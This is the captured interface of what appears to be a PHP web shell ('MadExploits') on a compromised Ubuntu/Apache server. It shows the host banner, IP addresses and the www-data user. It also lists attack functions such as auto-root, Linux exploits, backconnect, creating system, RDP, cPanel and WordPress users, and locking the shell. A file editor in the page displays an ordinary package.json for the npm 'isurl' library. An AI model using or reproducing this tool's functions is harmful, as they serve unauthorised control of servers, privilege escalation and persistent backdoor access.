Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.71.203.140
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
isurl /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
lib-es5
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
package.json
1.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "isurl", "description": "Determines whether a value is a WHATWG URL.", "version": "4.0.1", "license": "MIT", "author": "Steven Vachon <contact@svachon.com> (https://svachon.com)", "repository": "github:stevenvachon/isurl", "main": "lib", "browser": "lib-es5", "dependencies": { "has-to-string-tag-x": "^1.4.1", "is-object": "^1.0.1", "is-urlsearchparams": "^1.0.1" }, "devDependencies": { "@babel/cli": "^7.4.3", "@babel/core": "^7.4.3", "@babel/preset-env": "^7.4.3", "babelify": "^10.0.0", "browserify": "^16.2.3", "chai": "^4.2.0", "coveralls": "^3.0.3", "decache": "^4.5.1", "gzip-size-cli": "^3.0.0", "incomplete-symbol": "^1.0.0", "incomplete-url": "^4.0.0", "mocha": "^6.1.4", "nyc": "^14.0.0", "terser": "^3.17.0", "whatwg-url": "^7.0.0" }, "engines": { "node": ">= 8" }, "scripts": { "ci": "npm run test && nyc report --reporter=text-lcov | coveralls", "posttest": "nyc report --reporter=html && browserify lib --global-transform [ babelify --presets [ @babel/env ] ] --standalone=isURL | terser --compress --mangle | gzip-size", "prepublishOnly": "npm test && babel lib/ --out-dir=lib-es5/ --presets=@babel/env --source-maps", "test": "nyc --reporter=text-summary mocha test.js --check-leaks --bail" }, "files": [ "lib", "lib-es5" ], "keywords": [ "uri", "url", "whatwg" ] }
Close